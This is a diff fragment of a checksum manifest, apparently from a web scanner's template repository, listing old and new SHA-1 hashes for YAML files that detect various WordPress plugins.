+http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:b7d102f65a73bdd3b009e0a7ad81e447d3eaa88d +http/technologies/wordpress/plugins/contact-form-7.yaml:140ba02fcbd12efc5d09525f322fb443d6b2ad57 +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:ab0ad7bfdd3ea91630c85b581daab66df5554c48 +http/technologies/wordpress/plugins/cookie-law-info.yaml:a7af47d278ad5eb7224c350eb2246c432e3288d3 +http/technologies/wordpress/plugins/cookie-notice.yaml:de50919a6a468a9878240d88e8ddf4f9d52fb176 +http/technologies/wordpress/plugins/copy-delete-posts.yaml:0e850184e814cce643bbf4ad50036499a316ef5b +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:5d6aa81f5fd085008d3137a640ae215211b4c0c2 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:096ba6d050e5a6419cff50741d7f3e5907d9bf75 +http/technologies/wordpress/plugins/custom-css-js.yaml:4459e4d2fcf25c6b65ccf035c24fa8777c48f08c +http/technologies/wordpress/plugins/custom-fonts.yaml:08c475c2849a90c08b82b758cfe5b9aee0cd711d +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:edc7a821b6fe5b015138a01d2ebc3e6513f491f9 +http/technologies/wordpress/plugins/disable-comments.yaml:8c1ccb3aa597c3bf0c16e84bf79a6f136b13fe3c +http/technologies/wordpress/plugins/disable-gutenberg.yaml:c5f1d33397f74e2566cccfe9adf4149eb14b4a11 +http/technologies/wordpress/plugins/duplicate-page.yaml:6f972f4970eef86897f9b7aff1c0c74f6edf5f41 +http/technologies/wordpress/plugins/duplicate-post.yaml:c8b511a66ff43a45ffedd1b88a46d40e53a8005e +http/technologies/wordpress/plugins/duplicator.yaml:f6e89d5511f41ab8fead85b58a61d82176319d44 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:13b2156be104efcc96069f119cdc2c858b5aed3a http/technologies/wordpress/plugins/easy-fancybox.yaml:91706438bedc39afdeaebdbf43a683bb583c8ec0 http/technologies/wordpress/plugins/easy-google-fonts.yaml:1ac3ed149863a6ce5b4325901c49c6837a4c57ea -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d38f5c5580d03630dca29fbbea59a4690cf13e74 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:e91ed85a5188b8cb9d0bc15a5c9e9fd28f0550de -http/technologies/wordpress/plugins/elementor.yaml:d3ce0bf90a3e58d2885dfe1c15770b654d588b53 -http/technologies/wordpress/plugins/elementskit-lite.yaml:553bce634ce9106d6d44e044dce4bb74d1f324a8 -http/technologies/wordpress/plugins/enable-media-replace.yaml:ca7e2f1dc7f6570cbce75be09dac285f36a57870 -http/technologies/wordpress/plugins/envato-elements.yaml:3c12a99968e7ea0a54184bf49b83fb9d7b18163c -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:cbabf94ec95494024e08a122cfdc067fc93da17a -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:fa32afefefe158a3e313a356d5bf2bb2c697cb78 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:afc5e3bc8024802a3939dc05cebeee464daa2250 -http/technologies/wordpress/plugins/fast-indexing-api.yaml:86837d6956933e1fe302394de05e79e8a7424d32 -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:e2773e17b159c3652d438ef4a38fe5797fabd5f2 -http/technologies/wordpress/plugins/flamingo.yaml:f2a62ff36713fe5c4eee98699e6f1ff5dd35a5c8 -http/technologies/wordpress/plugins/fluent-smtp.yaml:d2577abaa1ddc6895c68d491b865b1c4e5d22fb4 -http/technologies/wordpress/plugins/fluentform.yaml:b4447ad0bc835d7148188b11cb7004a41f685547 -http/technologies/wordpress/plugins/font-awesome.yaml:1b1cd0d754f8e8903f2d272df262b89e1bc3c934 -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:a6d9f10790db0012b5affc8a0fb238a67d3da65d -http/technologies/wordpress/plugins/formidable.yaml:9aeab8e838e4a9b4390c722a24558624fbdf8878 -http/technologies/wordpress/plugins/forminator.yaml:f9844022f0b43a56df93988bcb0fa9cd01f53632 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:ebdd8f0ca962e2a656ed6539a8ffadc5b2a23b7c -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:be2ed7a249e60feb72922cf46aee4d6b5f1a1d4d -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:25920e213776ad5262df089856027e7d41817cd8 -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:c1d51904aadb72568374705ab2428e70d65c0a4c -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:e34a85a7232581d48b35735638964a9c9f8d70a2 -http/technologies/wordpress/plugins/google-site-kit.yaml:045f0707a109d806bdfbfb870ac1a6e6df2b5070 -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:436df26d432289b58fdd3cb093d56b6aeb426d04 -http/technologies/wordpress/plugins/gtranslate.yaml:61c4d83818f840d093fe89160eb44dbab44a5081 -http/technologies/wordpress/plugins/gutenberg.yaml:45848c6917e1cd3dc965d9554dd21b6f23164ca9 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:4cf7d7a6c06e379d35389d8a1ddd03e62a6f75ed +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:dc7f8a66d655b230b9f86e7408371b657afec872 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:7a3c617033da4dea65448ac98079dca7ce9eced7 +http/technologies/wordpress/plugins/elementor.yaml:87e57bed454c1ffa8f1180c092768b884c01fe55 +http/technologies/wordpress/plugins/elementskit-lite.yaml:fd765eb94f1951124b42f0060fdbaf3e41f64f94 +http/technologies/wordpress/plugins/enable-media-replace.yaml:ab31d8de8202f5fe56342e37e2b97b620c04a18d +http/technologies/wordpress/plugins/envato-elements.yaml:1792b1bb18d8e3b75290c49e9481abd752625f7f +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:e955c0301c4d36e1ed0058ca20df5e90550ff64a +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:b0b23c965232eedb1605f21ed92cd3647f6f18d4 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:0d6fa673ecc67045a97cd1b27b6de09368e069bc +http/technologies/wordpress/plugins/fast-indexing-api.yaml:89229b48edbf5b17553d55e6b39521ac3c61abcb +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:05492b67a15c0842ad5d7f263974671b9c461f84 +http/technologies/wordpress/plugins/flamingo.yaml:bbad18399f4057fce68a1019cfb0c177f3f66ad4 +http/technologies/wordpress/plugins/fluent-smtp.yaml:f8756f30bfdc614abb6aa0cef6f395e5a96615d8 +http/technologies/wordpress/plugins/fluentform.yaml:41bab87a01e0ce62341a024bd937104f1072b395 +http/technologies/wordpress/plugins/font-awesome.yaml:d61908d165c5e27d05672655e2a21614d82c7df7 +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:18bdbf5f4ab294b177f0bb0fe1591208b00ba16e +http/technologies/wordpress/plugins/formidable.yaml:fc76ea970f27659d0479ccde36ffea594b78ece7 +http/technologies/wordpress/plugins/forminator.yaml:0d0c8abfd5d9b766e1d1f9ea24639096df336219 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:06ed726b8d2b53d84fb0a0b1a5e7bee8ce776739 +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:eabba7c66e27662066cddd955ed9548285a0a19b +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:b80b8b453286fb2052562066564133d1df4d4522 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:52e327176ffa0934107760389a7fa6c15d6cd736 +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:98982c9edf9970367b127390e0c459c8b542e7fa +http/technologies/wordpress/plugins/google-site-kit.yaml:61300b4bd7867c298807e347709d0f2084201aa6 +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:38b0d8740502247c857db2223f0d1a3bf68881b1 +http/technologies/wordpress/plugins/gtranslate.yaml:f2c1f59a6c40d7979e51aa224166e4fdae6d61d6 +http/technologies/wordpress/plugins/gutenberg.yaml:b87560081e190486ebe86901eabd5efecc742a51 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:7403aa1e1055a924ed8a53be33eb00c623f83442 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1d20308687bcbd54bf13c6f4ed88aa5d5707b8e4 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:775d943014216e087b5ed592ac62eeb8e4a98258 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:58f7957a8dc04de2e287033704d8fe0492cec683 -http/technologies/wordpress/plugins/header-footer.yaml:946d3df27e849ae54ab1b237732e2fda6dddbc8f -http/technologies/wordpress/plugins/health-check.yaml:58e079cda6b5db60ef236c5ee682b88174953488 -http/technologies/wordpress/plugins/hello-dolly.yaml:5dd934123024e664ffea8cb394050b369f76eec6 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:db5a6b9f165977775c63a57250e7b5aa8a8a0769 -http/technologies/wordpress/plugins/hostinger.yaml:211d2607fe26198560bf482197c3a784be4388e8 -http/technologies/wordpress/plugins/image-optimization.yaml:8b1e23051af2a6b2a7a34b112ccb1c40d7e9d279 -http/technologies/wordpress/plugins/imagify.yaml:75175b81a22871e683511fc9134ed0d58f433b17 -http/technologies/wordpress/plugins/imsanity.yaml:b285404e1ca22f9c22ec807476e795a913ae2d66 -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:766910876bd385ff42848b445699d343dddf1bab -http/technologies/wordpress/plugins/instagram-feed.yaml:2842dafcf1ce9c4bbe078d0992a12ac2846cb09f -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:f4cf10a0e99afbca92eac94ba6644df84c98e447 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:a4d739ab05a15c526bd7196e0c28108397f46798 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:0f4e464758736202d4cd5f630e3d6ae78183e63d +http/technologies/wordpress/plugins/header-footer.yaml:92936c6a47ff4726b0a7b97c7ea5686b5a8798cf +http/technologies/wordpress/plugins/health-check.yaml:fcf0c9e7e685f9de5b96cf415282e7985bce1918 +http/technologies/wordpress/plugins/hello-dolly.yaml:ca7e60c9eba41d32c0aa040cec2124ee6d9ecae5 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:a2d3e90e76e99a6926515627ccfe2ba73c09bbe3 +http/technologies/wordpress/plugins/hostinger.yaml:3d1716bd2f46fb046fc487e581e644b972a5f161 +http/technologies/wordpress/plugins/image-optimization.yaml:12b0b8d10e65946e41142eb6a461eb801e925582 +http/technologies/wordpress/plugins/imagify.yaml:f085609c741c54a4bf3511d7bae996cc0d4eecff +http/technologies/wordpress/plugins/imsanity.yaml:913e20f768ce7b09c354531f4cf2bbc7db53093b +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:a36556103402d111ca593a49569521b6bc78a2e5 +http/technologies/wordpress/plugins/instagram-feed.yaml:93fb81f5e22e139fd2c0508740d52e896cf210c1 +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:a1363e721f2fe4ce39a3b05309da0f7c5addb465 http/technologies/wordpress/plugins/iwp-client.yaml:211621e7048b766fb8fc89837327329d606f1e50 -http/technologies/wordpress/plugins/jetpack-boost.yaml:dbf0ff1b1df5237578eb9c0060f666a54d447397 -http/technologies/wordpress/plugins/jetpack.yaml:159749d89ee996d67f1b0bda36f177fb711f85fe -http/technologies/wordpress/plugins/kadence-blocks.yaml:983e56f93f7bbf9a68caee4a00de272fb4cf59b2 -http/technologies/wordpress/plugins/kirki.yaml:c9da4d1fabd6ef240603b086ddd9631a17e1e128 -http/technologies/wordpress/plugins/leadin.yaml:58afebe7d97ab2165023b2d45ff682e5981eb8ad -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:e967ba157d86b299d4dad605b22a49c583585d35 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:9c762d870937f7a2781c819a0a0995db7ef558ba -http/technologies/wordpress/plugins/litespeed-cache.yaml:3d7fb3e6823cbc240cf465cf64045a68d40f7469 -http/technologies/wordpress/plugins/loco-translate.yaml:4910dc3ac5b72dda613566529a38f2ebcf57cb4e -http/technologies/wordpress/plugins/loginizer.yaml:7c3a68eaaa4591089c54bf4e8c18e71a137c0a62 +http/technologies/wordpress/plugins/jetpack-boost.yaml:7ada0ba0e1402f61160f703940af568bbdc5a78f +http/technologies/wordpress/plugins/jetpack.yaml:052e8123fe19a4ccbd88d7057b6220fc09bc49e5 +http/technologies/wordpress/plugins/kadence-blocks.yaml:462e77eee6dac513bd70e0d905c0430be341fc9a +http/technologies/wordpress/plugins/kirki.yaml:ee663466849a6e4a36b2e70523857761de9e4edc +http/technologies/wordpress/plugins/leadin.yaml:23f08928d76eb48d37b1fd9bbc17c729d533ebfb +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:a7f5642dee515d041e6f09dcd42eead3aed66ba7 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:3f9d5d7dc7e5ceee331b6ae8a8a280dd4937064c +http/technologies/wordpress/plugins/litespeed-cache.yaml:5be7ee817bf0054050bfd6590f987f5e6020acb9 +http/technologies/wordpress/plugins/loco-translate.yaml:3566c32068b67384b7867192b410b9af6fd8f958 +http/technologies/wordpress/plugins/loginizer.yaml:df5aaf6c0fc123cdf155860b02497d948055b5ab http/technologies/wordpress/plugins/loginpress.yaml:f3214f698e4519506749dc1c78c6c6f592d55cd7 -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:60dcbad959c33adbc97f5d9a8e8d8cb87f08bf6f -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:73566fde726ca4722f7022eac1c7e5f6973c46a6 -http/technologies/wordpress/plugins/mailpoet.yaml:abc3fd75f8e7290b96e88d0273e4acb7299725e1 -http/technologies/wordpress/plugins/maintenance.yaml:423bc2f88d4ccb4e6a770ec438acb0c1b28c81f6 -http/technologies/wordpress/plugins/mainwp-child.yaml:87b0ba04630df0d566ea648622aac6b7ee80491d -http/technologies/wordpress/plugins/malcare-security.yaml:0cef502fdaa3227aa0d5bef078a0f4d72867b0de -http/technologies/wordpress/plugins/megamenu.yaml:299d036b86ff2e99e0c20ef68f3f45c88ec75043 -http/technologies/wordpress/plugins/members.yaml:70146be15df2cf3aa3cad3700b82ce71346956c9 -http/technologies/wordpress/plugins/meta-box.yaml:37a38bc3f5854d81988a8cf6ee6e8bb47821a4ff -http/technologies/wordpress/plugins/metform.yaml:0cddbdf81266ebd3dd9ca76822c8df2453618d16 -http/technologies/wordpress/plugins/ml-slider.yaml:b2fde9da64ccf6e9cc75592aedf82b211b0b6f71 -http/technologies/wordpress/plugins/newsletter.yaml:e56ab1e9ad7ba6e75f03f6dc1e0d5e2b6201a0c8 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:32cf0d68b513fb5ea315b66e57387947558e1ac7 -http/technologies/wordpress/plugins/nextgen-gallery.yaml:b2ffe022e86a661db507a179af54a2a94d2244bd -http/technologies/wordpress/plugins/ninja-forms.yaml:dea8307a50202d0c3fd6c58746af3eacde5a66af -http/technologies/wordpress/plugins/ocean-extra.yaml:bcbf3a363cdbd82faa37f17da3a5dd945474a326 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:3626406c4ffa652234a2368127cd0c0a7cf32a1d -http/technologies/wordpress/plugins/one-click-demo-import.yaml:6e4ca31fb82dabfd4d05e36ef02d2013f9ffae6c -http/technologies/wordpress/plugins/optinmonster.yaml:6cff98da0a5cc5df96e13cd6b4858f8d6f49e244 -http/technologies/wordpress/plugins/otter-blocks.yaml:4c3c1bf25113c7ef5ee1d439b72f5adf00303f96 -http/technologies/wordpress/plugins/password-protected.yaml:80ea5d36abeda00370782f2248183a473f36974a -http/technologies/wordpress/plugins/pdf-embedder.yaml:980668daf0d228eda37c63a90641b3aa81d37efd +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:772f0c28175630aec6a63eb504d2ea1b74a25dd2 +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:1c05f90eb50f3a8f072925cd0303e84b199e41ec +http/technologies/wordpress/plugins/mailpoet.yaml:76728bbd00bb646eec55a8a5e6c469a30a718300 +http/technologies/wordpress/plugins/maintenance.yaml:44bd53f11dedde34fbc81dd58604744f1d183223 +http/technologies/wordpress/plugins/mainwp-child.yaml:fbf0ec1689a90f783c8ceb02f7a04382c39309e5 +http/technologies/wordpress/plugins/malcare-security.yaml:5f2ef05bae54a6a05dba95fac2c45753422d9185 +http/technologies/wordpress/plugins/megamenu.yaml:3a3867b2e7000490acec8a1db0f7765ed9fc8fe1 +http/technologies/wordpress/plugins/members.yaml:ba857dc41e1d31243de30015c4d9470d42df8c53 +http/technologies/wordpress/plugins/meta-box.yaml:8c38bd4306888e54dc3391102d10fa72837e1043 +http/technologies/wordpress/plugins/metform.yaml:90f52dbae57fb96e16c98281f8524d0daf351e9e +http/technologies/wordpress/plugins/ml-slider.yaml:7ed06a67a393d9bf9c1354a894fa26bca17fd4a2 +http/technologies/wordpress/plugins/newsletter.yaml:3ee3c651239599cb45dcf220c7409494c9ebe9c3 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:0c33021a4eefb6a660c593071371537361dfb84d +http/technologies/wordpress/plugins/nextgen-gallery.yaml:ea5e79cd98b84b48b69a0145227d4ec435ed5392 +http/technologies/wordpress/plugins/ninja-forms.yaml:eaafa820796d0c404ee59dd9efefab26c58c4624 +http/technologies/wordpress/plugins/ocean-extra.yaml:65228be6752d1dc95c05dd0a4c75209b04a41790 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:42b1aeba39e9d1062b8b35b5d6fc1c9ac92914f0 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:9b10160492a86d235ec330579fdefa5eb92b1a95 +http/technologies/wordpress/plugins/optinmonster.yaml:cb72b324f850b87de1beac0dce1f120bd5e89a47 +http/technologies/wordpress/plugins/otter-blocks.yaml:1d77ec76194db956e207c4671a626de6fb1b20e7 +http/technologies/wordpress/plugins/password-protected.yaml:691f351480bb6cd23aa7afedf5dcde3862b61154 +http/technologies/wordpress/plugins/pdf-embedder.yaml:93ec0b4ddeff00afbd2b34a4e49371ceb2d4c48d http/technologies/wordpress/plugins/photo-gallery.yaml:37274dfdbd25ec4bcb7a3f79052c88d9df2c023e http/technologies/wordpress/plugins/php-compatibility-checker.yaml:9ae2457c7e9d21bee89ff0283903047bd188b93d -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:ca4e1e56f683de640e9b0e1476243d9bd253438f -http/technologies/wordpress/plugins/pixelyoursite.yaml:8ba601b2b19cf78013230e228077b6923ef70f59 -http/technologies/wordpress/plugins/polylang.yaml:73302865e63a4d5927b3ce0c7767596295c8c0f7 +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:ea3fc197949183230c36a54ec40ce7cec2ce05cb +http/technologies/wordpress/plugins/pixelyoursite.yaml:b5bbf81e5eb650342b3d4c2fca46310ee8801848 +http/technologies/wordpress/plugins/polylang.yaml:366f25da7da9f9f2f6aa349b25c24d9242b86c1a http/technologies/wordpress/plugins/popup-builder.yaml:468087ab250c0b356f499a501d5a948d709c9a05 -http/technologies/wordpress/plugins/popup-maker.yaml:b3e0f822afeb3b8c3edde9155569de84d0371fab -http/technologies/wordpress/plugins/post-smtp.yaml:acd3913e3538b51ce5cbb1025606d2c3586d8d97 -http/technologies/wordpress/plugins/post-types-order.yaml:cb4bad182e5dda47cfc91cb86e5c1d6c9e5f2392 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:a4ccc8ce0dc76e20af52ba95ef463dd32d49b3d2 -http/technologies/wordpress/plugins/pretty-link.yaml:f72d42c32a42458a4c220ee31c7dbc05aafe72ed -http/technologies/wordpress/plugins/really-simple-captcha.yaml:ce9f215b2a6168c928c058c49ad0d4f058de116b -http/technologies/wordpress/plugins/really-simple-ssl.yaml:01f65b4e88852d0eba6cad299cefad9aa814a175 -http/technologies/wordpress/plugins/redirection.yaml:c509add6ba93f844014b7094845213d338871a6a -http/technologies/wordpress/plugins/redux-framework.yaml:c31e05d0d24b24b145744f4a0b59f65efc25b472 -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:2412e62afb652a9898c01f01b3c76792a8f68da7 -http/technologies/wordpress/plugins/royal-elementor-addons.yaml:8025dd02daa23258cdf25f5c6c3574ff56abce00 -http/technologies/wordpress/plugins/safe-svg.yaml:33d7e22252cf584abd63e69ee8ffc34d7b3ea441 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:ab5555dde26f3050197d5e7cf7f25bff83ff5af2 -http/technologies/wordpress/plugins/sg-cachepress.yaml:797d55f9e9472e69b221ddb59f8922544872508e -http/technologies/wordpress/plugins/sg-security.yaml:499efaa23f5f7f22ecdc170a9f4cf95f2aacd82c -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:f6d011a089c3896f391f5772ce8d789527dba7ad -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:d023a2687180560a4f1f9b38a1be76cfc9fafb2e -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:999f2a12836a54607efc04bfe7d099f24f4b0d10 +http/technologies/wordpress/plugins/popup-maker.yaml:1c4cfb8a42e30c98281bc9a2f5c966d999c2a7d7 +http/technologies/wordpress/plugins/post-smtp.yaml:5146be93263e512b200ab784727f91612d5117f6 +http/technologies/wordpress/plugins/post-types-order.yaml:3691aaa9f183d9feef18ec4b069b169a96871b81 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:5eac1e84dd2eb1f27121ee409e9e4c6f69ed588c +http/technologies/wordpress/plugins/pretty-link.yaml:4f1ad7829fcfd53a4951657a3764f5d956eb18c9 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:f76181edda9b3d62e3ea21bd51a4d5e4c450bef6 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:bb7296600fad043c5a5fa3ea8c4d3de597e133bc +http/technologies/wordpress/plugins/redirection.yaml:f2fc65063eeb5b4f425e53c33e752b0acc46e8f1 +http/technologies/wordpress/plugins/redux-framework.yaml:af9b75a984712e6609f6bd94f956e026b9dc307b +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:c0fa1d1aece59d5d6e8e708f4b2d49e769998dd9 +http/technologies/wordpress/plugins/royal-elementor-addons.yaml:81ee3491d2caa18b8f476cbc4f8bdf6645f98857 +http/technologies/wordpress/plugins/safe-svg.yaml:7593c611e1da50fc587d7a34a6447f494d5cddb8 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:91918b715b41c561ccd6da01b15c5710ceefd48d +http/technologies/wordpress/plugins/sg-cachepress.yaml:86a47e535c821c5c1af37c73687729982a7e8256 +http/technologies/wordpress/plugins/sg-security.yaml:e833734b1006bc06ee6c86a825b3902ec67fb113 +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:55d132c332394a78efb0b3130261bf37cc0612d2 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:196c39da6c914816c14f11df5fc9106d9439f200 +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:f7959e70ca5912ffccbe8bfb5aaf69f15dea94ad http/technologies/wordpress/plugins/simple-history.yaml:446824d0a69fc495005942a3e32febdca2e7dfb1 http/technologies/wordpress/plugins/simple-page-ordering.yaml:7d96ac56d7ed2ed031b6789429888ef703d39538 -http/technologies/wordpress/plugins/siteguard.yaml:1c984b79f8a04711adca1ccfa690c48b3ea79ee1 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:c06d5a46179e184df976f8208345f50e705cfdc4 -http/technologies/wordpress/plugins/smart-slider-3.yaml:2d2e521597cadc6ce9c68a6bae06e27e82d05b67 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:6050ea9369ce9e1a8e406f50d3a8cb7a28e3198d +http/technologies/wordpress/plugins/siteguard.yaml:1603622bb764bbd891fa245b1fb0851d8443eec0 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:bdd37fdd569c13441fb87d5a310a8beca53ecead +http/technologies/wordpress/plugins/smart-slider-3.yaml:6669412fae6e1f830d8132df4b3ad7036fa95746 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:9e123d8b5122703a197a8279f6b6612af707aa1f http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:aab70fa0f4b1c898371aa4af959db60e6cc733dd -http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:597df3b8800543e18c1cfa22f7c87817ea792b02 -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:c263b1add57fa8c8110bc0ac235498b6fd07b138 -http/technologies/wordpress/plugins/sucuri-scanner.yaml:2ab9bb54964910c5486c845e78ba1f848e6281c0 +http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:218b764f5e7ec74be15c072c6dcef4976de6d79b +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:48e485435630e99bcc197171a946575b47361c73 +http/technologies/wordpress/plugins/sucuri-scanner.yaml:73a5d57f8a22ede9c4de7d3fba4f1aeaa4c4bb2e http/technologies/wordpress/plugins/svg-support.yaml:da47523057818a5fd4aa3e9d06c98c4f452f4222 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:e3d74bfd481d273d89a35b4ea9877481fcb970f9 -http/technologies/wordpress/plugins/tablepress.yaml:a716949a5c929e4e402b29b7d1a90f8ec965167f -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:311c5c0e1a6843664425df5ee47360d2b9761a9b -http/technologies/wordpress/plugins/templately.yaml:61c97b88c41929b9ffba8e350287e096c3fe4b55 -http/technologies/wordpress/plugins/the-events-calendar.yaml:433b3046483a0f2f8035a83c60e302a8871c36ca +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:e9ca166f376b599e787a66db6114262e2a888811 +http/technologies/wordpress/plugins/tablepress.yaml:1907c25a373a78ea4c81d21eae209acb12104a9b +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:a8ac16c00a1fe225e48ebe24c94aba1323e1e584 +http/technologies/wordpress/plugins/templately.yaml:85704028e9e8d3e3a3ca74af306a32d502c4388d +http/technologies/wordpress/plugins/the-events-calendar.yaml:52c6ff41c4bd34154268728639cfa0e3b4f8d8ab http/technologies/wordpress/plugins/themeisle-companion.yaml:c706aef04e5b9ce414f460819eca30bb3bcb00e5 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:eee7584700a7e387e4617f7cc4327fce10539344 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:8a51373d865f5d6273ce369cd11aaee05cf598b4 -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:bf1e55854a08748896c345b2177a7fa07e815803 -http/technologies/wordpress/plugins/under-construction-page.yaml:51199cb9b1d199a2d8d7f3c236ed1c5edb1480da +http/technologies/wordpress/plugins/tinymce-advanced.yaml:9e6bb4ae3c2a1718e019e5374810c6b9e64fa3f5 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:97b7e9a9b4b15aff49cca7d5e725392e7bf627fd +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:9c37c0d9262b2938015364f494651b05b0fa6033 +http/technologies/wordpress/plugins/under-construction-page.yaml:c76e58a7cf7365aaaa3685531874f5d2ea3d1b68 http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e -http/technologies/wordpress/plugins/updraftplus.yaml:3c4eac9c7a21d6e3e99d8b494fbd6cb0921f2118 +http/technologies/wordpress/plugins/updraftplus.yaml:5050d66d21b2380882e67332a769bc7da06154e6 http/technologies/wordpress/plugins/use-any-font.yaml:e1c358a86017c4c3f5abe62d76da6878d61f5d47 -http/technologies/wordpress/plugins/user-role-editor.yaml:c94edaaebf7e34426a7abb273c207e2ba6d84ab0 +http/technologies/wordpress/plugins/user-role-editor.yaml:65b055fb6332b2169a9e7143591f116c146e06a8 http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:1a6d9e7560dba5c9471c20cffdf0ba1b098fbb7c -http/technologies/wordpress/plugins/w3-total-cache.yaml:efc0bd8f16978e643c8725934fed468b441c2491 -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:ec809756afe71d219531c75ee7cfa9a7db9046e4 -http/technologies/wordpress/plugins/webp-express.yaml:288f2ccfc078b7e30cdd7b0e752a81043a918916 -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:7737b6170452204f87a5a937a523eacb214db0dc -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:efbffb76b5d7ce033f27342b5dc40d7dc275c550 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:74a39f9b2289358b6de6309a633fe7a70f32f29a -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:27d981787e245dd4e9e53bbe17dee5688df0ec50 +http/technologies/wordpress/plugins/w3-total-cache.yaml:e6d76a664a5009598ce3e2d6f3b412667c9cacef +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:305690e415de547348ac36cf0d9544b347b16a38 +http/technologies/wordpress/plugins/webp-express.yaml:fcb956491146843be9f3b5f152965cc0796f75e8 +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:ffa48fc0f80ceb41dff2b5c69116837b0111e074 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6db1302965c217cd38e160295fd9d7defa47afa9 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:c2b6a592df83eb0b6abbfa988893633cb948b997 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:68f2dd5d2776de335efc273ddf2249b507527398 